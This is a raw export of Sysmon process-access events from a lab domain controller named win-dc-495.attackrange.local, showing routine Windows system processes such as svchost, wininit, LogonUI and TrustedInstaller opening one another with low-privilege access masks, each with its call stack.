10341000x8000000000000000567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.935{59A5CD1D-8DF7-6005-2C02-00000000A201}41283480C:\Windows\servicing\TrustedInstaller.exe{59A5CD1D-8DF7-6005-2D02-00000000A201}4380C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+693a8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.888{59A5CD1D-8CA9-6005-0E00-00000000A201}10884600C:\Windows\system32\LogonUI.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA9-6005-0E00-00000000A201}1088C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0900-00000000A201}804C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0900-00000000A201}804C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801144C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801144C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801144C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5d917|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801144C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801144C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801144C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
